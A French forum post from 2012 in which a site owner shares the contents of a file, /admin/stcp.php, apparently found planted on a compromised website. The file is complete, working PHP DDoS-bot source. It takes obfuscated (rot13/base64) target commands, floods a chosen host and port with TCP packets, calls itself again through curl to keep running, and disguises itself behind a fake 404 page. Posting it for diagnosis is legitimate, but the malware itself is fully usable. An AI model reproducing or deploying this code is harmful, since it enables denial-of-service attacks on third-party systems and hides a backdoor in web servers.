25/10/2012, 14:14:04
Voici le contenu du fichier déclaré comme étant la cause du problème lors du premier "piratage":
/admin/stcp.php
Voici la liste des modules présents:
/admin/stcp.php
Code :
[== PHP ==]
<?php
@ignore_user_abort(TRUE);
@set_time_limit(0);
@ini_set("display_errors","off");
@error_reporting(0);
function cmdexec($cmd)
{
if(function_exists('exec'))@exec($cmd);
elseif(function_exists('passthru'))@passthru($cmd);
elseif(function_exists('shell_exec'))@shell_exec($cmd);
elseif(function_exists('system'))@system($cmd);
elseif(function_exists('popen'))@popen($cmd,"r");
}
if ($_REQUEST['action'] == "status")
{
die("itsoknoproblembro");
}
$packets = 0;
Function decodesttr($string)
{
$string = @str_rot13($string);
$start_str = @substr($string,2);
$end_str = @substr($string,0,2);
return @base64_decode($start_str.$end_str);
}
function curPageURL()
{
$pageURL = 'http';
if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
$pageURL .= "://";
if ($_SERVER["SERVER_PORT"] != "80")
{
$pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
}
else
{
$pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
}
return $pageURL;
}
if ($_REQUEST['action'] == 'start')
{
$action1=$_REQUEST['page'];
$action = decodesttr($_REQUEST['page']);
@list ($host,$port,$size,$exec_time) = explode("[#]",$action);
//cmdexec("ping -f $host");
if(isset($_REQUEST['time_s']))
{
$time = $_REQUEST['time_s'];
$max_time = $_REQUEST['time_e'];
}
else
{
$time = time();
$max_time = $time+$exec_time;
}
function pack_str($str, $len)
{
$out_str = "";
for($i=0; $i<$len; $i++)
{
$out_str .= pack("a$len", ord(substr($str, $i, 1)));
}
return $out_str;
}
$out = str_repeat("A", $size);
$step_time=time()+60;
$release_time=time()+1;
$first1=0;
while(time() < $max_time)
{
if(time() > $release_time && $first1==0)
{
$first1=1;
$address_host="http://".$_SERVER['HTTP_HOST']."/".$_SERVER['PHP_SELF'];
$ch =@curl_init();
@curl_setopt($ch,CURLOPT_URL,$address_host."?action=start&time_s=$time&time_e=$max_time&page=$action1");
@curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);
@curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,2);
@curl_setopt($ch,CURLOPT_HEADER,0);
@curl_setopt($ch,CURLOPT_RETURNTRANSFER,0);
@curl_setopt($ch,CURLOPT_TIMEOUT,10);
@curl_exec($ch);
}
if(time() > $step_time)
{
@exit();
@die();
}
@stream_set_timeout($socket,0,1);
$socket = @stream_socket_client("tcp://$host:$port",$err,$err2,1,STREAM_CLIENT_ASYNC_CONNECT);
if ($socket)
{
@stream_socket_sendto($socket,$out);
}
@fclose($socket);
}
$base = dirname(__FILE__)."/";
//unlink($base."stcp.php");
//cmdexec("killall ping");
die();
}
if($_REQUEST['action']==NULL)
{
print "<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /stph.php was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>";
}
?>
Voici la liste des modules présents: